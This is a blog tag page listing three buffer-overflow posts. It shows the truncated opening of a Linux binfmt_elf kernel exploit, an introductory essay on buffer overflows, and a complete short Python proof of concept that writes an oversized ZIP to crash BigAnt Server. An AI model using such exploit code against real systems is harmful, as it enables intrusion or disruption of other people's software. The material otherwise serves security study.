GO IT WORLD | IT TECH | IT NEWS » buffer overflow

Linux binfmt_elf core dump buffer overflow

jason — Mon, 19 Sep 2011 13:45:40 +0000

/*
* Linux binfmt_elf core dump buffer overflow
*
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
// phase 1
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>

#include <sys/time.h>
#include <sys/resource.h>

#include <asm/page.h>

static char *env[10], *argv[4];
static char page[PAGE_SIZE];
static char… Read the rest

Buffer Overflows exploit

jason — Mon, 06 Dec 2010 07:04:37 +0000

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer… Read the rest

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

jason — Tue, 20 Oct 2009 11:59:56 +0000

#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By:     Dr_IDE
# Tested:       XPSP3
# Usage:        Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()